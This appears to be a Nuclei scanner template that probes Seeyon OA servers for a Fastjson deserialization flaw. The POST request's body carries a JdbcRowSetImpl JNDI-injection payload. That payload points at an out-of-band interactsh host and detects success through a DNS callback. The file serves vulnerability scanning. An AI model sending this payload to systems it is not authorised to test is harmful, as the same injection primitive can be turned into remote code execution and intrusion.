id: seeyon_fastjson

info:
  name: 致远seeyon_fastjson漏洞
  author: Str1am
  severity: critical
  tags: seeyon,seeyon_fastjson

requests:
  - raw:
      - |
        POST /seeyon/main.do?method=changeLocale HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 79
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
        Cookie: JSESSIONID=5418C5A5511E3BC9806412DD8023386E; loginPageURL=""
        Connection: close

        _json_params={"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"{{interactsh-url}}","autoCommit":true}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"